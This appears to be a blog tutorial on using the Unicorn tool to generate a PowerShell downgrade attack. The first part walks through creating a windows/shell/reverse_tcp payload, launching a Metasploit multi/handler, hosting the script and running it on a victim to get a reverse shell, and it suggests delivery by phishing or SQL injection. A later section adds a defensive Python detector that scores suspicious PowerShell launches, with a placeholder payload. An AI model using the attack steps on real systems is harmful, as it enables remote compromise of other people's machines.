Powershell Downgrade Attack using Unicorn

Dave Kennedy released a tool called Unicorn that is awesome. It is a tool that uses a PowerShell downgrade attack and injects shellcode straight into memory. It's based on Matthew Graeber's PowerShell attacks and the PowerShell bypass techniques presented by Dave Kennedy and Josh Kelly back at Defcon 18. It supports Metasploit, Cobalt Strike and your own shellcode. Again, it's awesome.

So, let's check out a simple PowerShell example: a reverse shell back to a multi/handler using windows/shell/reverse_tcp.

Here's an example of how to use it:

We first pull down the tool from github:


Once downloaded, navigate to the folder.

Once in the folder, we can utilize a very simple windows reverse shell:

# PS Example: python unicorn.py windows/shell/reverse_tcp <IP> <Port>

python unicorn.py windows/shell/reverse_tcp 443

Once generated, two files will be created. The first is powershell_attack.txt, which is what will be delivered to the victim and run. This PowerShell script can be run in whatever way you are able to deliver the exploit, whether through SQL injection, phishing or having access to a cmd prompt on the victim. The other file is unicorn.rc. This is used to create your listener via Metasploit.

To begin, we run msfconsole and the unicorn.rc file:

geoda@kali:/opt/unicorn$ sudo msfconsole -r unicorn.rc
[*] Processing unicorn.rc for ERB directives.
resource (unicorn.rc)> use multi/handler
resource (unicorn.rc)> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
resource (unicorn.rc)> set LHOST
resource (unicorn.rc)> set LPORT 443
LPORT => 443
resource (unicorn.rc)> set ExitOnSession false
ExitOnSession => false
resource (unicorn.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (unicorn.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on
msf5 exploit(multi/handler) > 

With our multi/handler running, we now need to run the PowerShell script on the victim. For demonstration purposes, we will just host the file with Python's SimpleHTTPServer:

geoda@kali:/opt/unicorn$ python -m SimpleHTTPServer
Serving HTTP on port 8000 ...

Now, on the victim machine, we navigate to our attacker URL and click on the powershell_attack.txt file to bring up the powershell script:

At this point, we can simply copy this script, paste it into a cmd and run it. You'll see your multi/handler get a connection and you're now on the box:

This has successfully bypassed some host-based controls too. What an awesome tool. Thanks Dave and TrustedSec!
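From the defender's side, the chain described above (a script pasted into cmd, which launches PowerShell with a hidden window and an encoded command) leaves a recognisable shape in process-creation telemetry. The following is an added example, not code from the post or from the Unicorn project: a small scoring detector run over constructed Sysmon/4688-style events. The command-line indicators it looks for (hidden window, encoded command, a request for the version 2 engine, profile and execution-policy bypass, a SysWOW64 PowerShell image, and cmd.exe or PowerShell as the parent) are generic PowerShell-abuse indicators that I am assuming for the example; they are not a description of the exact output Unicorn generates, and the base64 blob in the sample events is a placeholder rather than a real payload.

```python
import re
from dataclasses import dataclass

@dataclass
class Finding:
    """One suspicious PowerShell launch with the indicators that fired."""
    cmdline: str
    indicators: list
    score: int

# Command-line indicators: (name, weight, pattern). Weights are an assumption
# chosen for this example; tune them against your own environment.
INDICATORS = [
    # -w hidden / -WindowStyle Hidden / /w 1
    ("hidden_window",    2, re.compile(r"(?i)(?:^|\s)[-/]w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b")),
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob
    ("encoded_command",  3, re.compile(r"(?i)(?:^|\s)[-/]e(?:c|nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}")),
    # -version 2 / -v 2: asks for the legacy engine
    ("version_2_engine", 3, re.compile(r"(?i)(?:^|\s)[-/]v(?:ersion)?\s+2(?:\.0)?\b")),
    ("no_profile",       1, re.compile(r"(?i)(?:^|\s)[-/]nop(?:rofile)?\b")),
    ("policy_bypass",    1, re.compile(r"(?i)(?:^|\s)[-/]e(?:p|xecutionpolicy)\s+bypass\b")),
]

# Placeholder base64 (encodes "ABCDEFGHIJKLMNOPQRSTUVWXYZ"), not a real payload.
B64 = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo="

# Constructed process-creation events; these are not real captures.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell /w 1 /C "powershell -nop -w hidden -ec ' + B64 + '"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -version 2 -nop -w hidden -e " + B64},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1"},
]


def process_indicators(event):
    """Indicators drawn from the image path and the parent process."""
    hits = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    if "\\syswow64\\" in image:          # 32-bit PowerShell on a 64-bit host
        hits.append(("wow64_powershell", 2))
    if parent.endswith("\\cmd.exe"):     # script pasted into a cmd prompt
        hits.append(("spawned_from_cmd", 1))
    if parent.endswith("\\powershell.exe"):  # PowerShell re-launching itself
        hits.append(("nested_powershell", 2))
    return hits


def score_event(event, threshold=4):
    """Return a Finding if the event is a PowerShell launch above threshold."""
    if not event["image"].lower().endswith("powershell.exe"):
        return None
    hits = process_indicators(event)
    for name, weight, pattern in INDICATORS:
        if pattern.search(event["cmdline"]):
            hits.append((name, weight))
    score = sum(weight for _, weight in hits)
    if score < threshold:
        return None
    return Finding(event["cmdline"], [name for name, _ in hits], score)


def scan(events, threshold=4):
    """Score every event and keep the ones that cross the threshold."""
    return [f for f in (score_event(e, threshold) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"score={finding.score} indicators={finding.indicators}")
        print(f"  {finding.cmdline}")
```

The two benign launches (a scheduled inventory script and an admin deploy script run with an execution-policy bypass) stay below the threshold, while the two launches that match the shape of the attack in this post score well above it. Because it is a weighted score rather than a single-string match, renaming or re-ordering the switches in the payload does not trivially defeat it, and the process-tree indicators fire even when the command line itself is obfuscated.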

Hope this has helped. Until next time.